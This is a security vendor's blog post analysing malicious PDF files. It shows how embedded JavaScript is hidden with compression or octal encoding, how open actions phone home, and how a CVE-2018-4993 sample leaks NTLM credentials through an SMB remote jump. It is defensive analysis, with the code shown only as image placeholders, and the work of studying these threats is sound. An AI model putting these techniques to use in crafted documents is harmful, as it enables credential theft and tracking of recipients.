Malicious PDFs | Revealing the Techniques Behind the Attacks

Most of us are no strangers to phishing attempts, and over the years we’ve kept you informed about the latest tricks used by attackers in the epidemic of phishing and spear-phishing campaigns that plague, in particular, email users. Like other files that can come as attachments or links in an email, PDF files have received their fair share of attention from threat actors, too. In this post, we’ll take you on a tour of the technical aspects behind malicious PDF files: what they are, how they work, and how we can protect ourselves from them.

How Do PDF Files Execute Code?

Regular readers of the SentinelOne blog will be familiar with the idea of malicious Office attachments that run VBA code from Macros or use DDE to deliver attacks, but not so well-known is how PDFs can execute code.

In some kinds of malicious PDF attacks, the PDF reader itself contains a vulnerability or flaw that allows a file to execute malicious code. Remember that PDF readers aren’t just applications like Adobe Reader and Adobe Acrobat. Most browsers contain a built-in PDF reader engine that can also be targeted. In other cases, attackers might leverage AcroForms or XFA Forms, scripting technologies used in PDF creation that were intended to add useful, interactive features to a standard PDF document.

“One of the easiest and most powerful ways to customize PDF files is by using JavaScript.” (Adobe)

To get a better understanding of how such attacks work, let’s look at a typical PDF file structure. We can safely open a PDF file in a plain text editor to inspect its contents. At first glance, it might look indecipherable:

Image of obfuscated javascript

However, with a bit of knowledge of PDF file structure, we can start to see how to decode this without too much trouble. The body or contents of a PDF file are listed as numbered “objects”. These begin with the object’s index number, a generation number and the “obj” keyword, as we can see at lines 3 and 19, which show the start of the definitions for the first two objects in the file:

1 0 obj
2 0 obj

The end of each object is signalled with the keyword endobj , as seen at lines 18 and 24 for Object 1 and Object 2, respectively.

Object 2 immediately offers us some clues. We can see that it contains a dictionary (signalled by the chevrons > . The dictionary has an entry for a JavaScript stream and a reference to Object 1:

This tells us that the “garbage” code in Object 1 between the keywords stream (line 8) and endstream (line 15) is actually a JavaScript stream. Even better, Object 1’s dictionary is kind enough to tell us how to decode it. Line 6 specifies a “filter” of value “FlateDecode”. We can now write a quick-and-dirty Python script that decompresses the stream into plain JavaScript:

Image of decoding with python

Cleaning Up the Code

Our Python script churns out the JavaScript perfectly but not exactly beautifully:

Image of decoded but unformatted JS

As we’ve pointed out before, one thing you need to get used to when doing this kind of work is tidying up code to make it easier to work on. Here’s the same code after running it through a beautifier or prettifier in Sublime Text:

Image of prettified JS

Now we can read the JavaScript and determine if it’s malicious or not. In this case, the code appears to be contacting a domain called “readnotify.com”. Making callbacks (“phoning home”) without user consent shows at least a lack of concern for user privacy. For people working in journalism or in politically-sensitive areas this could be a serious issue, as this kind of callback can reveal the user’s IP address, operating system and browser version to a remote server.

More Malicious JavaScript

Compressed streams aren’t the only way PDF files can contain obfuscated code. Here’s another that looks a bit more of a worry when we look at its hash on VirusTotal:

Image of CVE 2018 4993 on Virustotal


As the image from VT makes clear, this is some kind of trojan that’s exploiting CVE-2018-4993. Let’s open it up and take a look inside.

Image of octal encoded JavaScript

This is a very small file. There’s only 4 objects, but the one that interests us is Object 3 and the value for the dictionary key /AA . Note that this contains a child dictionary with key name /O . That’s important because the /O key specifies actions that should occur when a document is opened. And the value of this key is itself another dictionary containing /JS , indicating yet again some encoded JavaScript.

Unlike our previous file, however, this one does not specify a filter. Luckily, the value of “JS” is clearly recognisable as octal encoding. Octal (or “oct”) uses three digits between 0 and 7 to specify a single value. The best thing about oct is we don’t need to roll up our Python sleeves to interpret it; we can just print it out directly on the command line:

Image of printing octal encdoed JS

As printf shows, the octals represent the same kind of JavaScript call that we saw in the previous example, leveraging the this.submitForm() function.

Image of beautified JavaScript

Going back to the /AA dictionary in the PDF, note the two lines which specify

This code issues the “Go To Remote” action, telling the reader application to jump to the destination specified under the /F key.

Stealing Credentials with an SMB Attack

We can use cURL to grab the headers from that IP address to see what we can learn.

Image of using curl to get header info

Looks like we need some authentication to get past the server, and that’s exactly where the danger lies for Windows users. If the attacker has set up the remote file as an SMB share, then the crafted PDF’s attempt to jump to that location will cause an exchange between the user’s machine and the attacker’s server in which the user’s NTLM credentials are leaked.

This happens because when a user tries to access SMB shared files, Windows sends the user name and a hashed password to automatically try to log in. Although the hashed password is not the user’s actual password, the leaked credentials can both be used to set up SMB Relay attacks and, if the password is not particularly strong, the plain-text version can easily be retrieved from the hash by automated password-cracking tools.

Let’s see what VT makes of the IP address.

Image of malicious url detection

This host has a reputation as malicious, so there’s a good chance that this PDF file is, as suspected, trying to capture the user’s NTLM credentials.

Threat Hunting with Ease How to Protect Your Enterprise Data from Leaks?

Another Day, Another Callback

In January this year, another kind of callback flaw was spotted in XFA forms. XFA (also known as “Adobe LiveCyle”) was introduced by Adobe in PDF v1.5 and allows PDFs to dynamically resize fields within a document, among other things. Unfortunately, XFA also lends itself to misuse. As explained in this POC, a stream can contain an xml-stylesheet that can also be used to initiate a direct connection to a remote server or SMB share.

Image of xfa callback

In this stream, the reader will parse the URL and immediately attempt a connection. Although there are no known cases of this method being used in the wild to date, the researcher tested it against Adobe Acrobat Reader DC, version 19.010.20069.

Protecting Against PDF Attacks

It’s impossible to tell whether a PDF file contains a credential stealing-callback or malicious JavaScript before opening it, unless you actually inspect it in the ways we’ve shown here. Of course, for most users and most use cases, that’s not a practical solution.

There are, however, a couple of things you can do on the user-side. Most readers and browsers will have some form of JavaScript control. In Adobe’s Acrobat Reader DC, for example, you can disable Acrobat JavaScript in the Preferences and manage access to URLs. Similarly, with a bit of effort, users can also customize how Windows handles NTLM.

While these mitigations are “nice to have” and certainly worth considering, bear in mind that these features were added, just like MS Office Macros, to improve usability and productivity. Therefore, be sure that you’re not disabling some functionality that is an important part of your own or your organization’s workflow.

For enterprise situations, you should ensure you have a good EDR security solution that can offer both full visibility into your network traffic, including encrypted communications, and which can offer comprehensive Firewall control. Of course, in these days, behavioral AI detection is a must-have to properly protect your network and assets from all attacks, including malicious PDF. SentinelOne customers can, in addition, scan PDF documents before they are accessed with our Nexus Embedded SDK.

Conclusion

Leveraging malicious PDFs is a great tactic for threat actors as there’s no way for the user to be aware of what code the PDF runs as it opens. Both the file format and file readers have a long history of exposed and, later, patched flaws. Because of the useful, dynamic features included in the document format, it’s reasonable to assume further flaws will be exposed and exploited by adversaries. With the ever-increasing tide of phishing and social engineering tactics targeting users, it’s vital that you remain vigilant about the dangers of PDFs and deploy a Next Gen security solution to prevent attacks.

Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security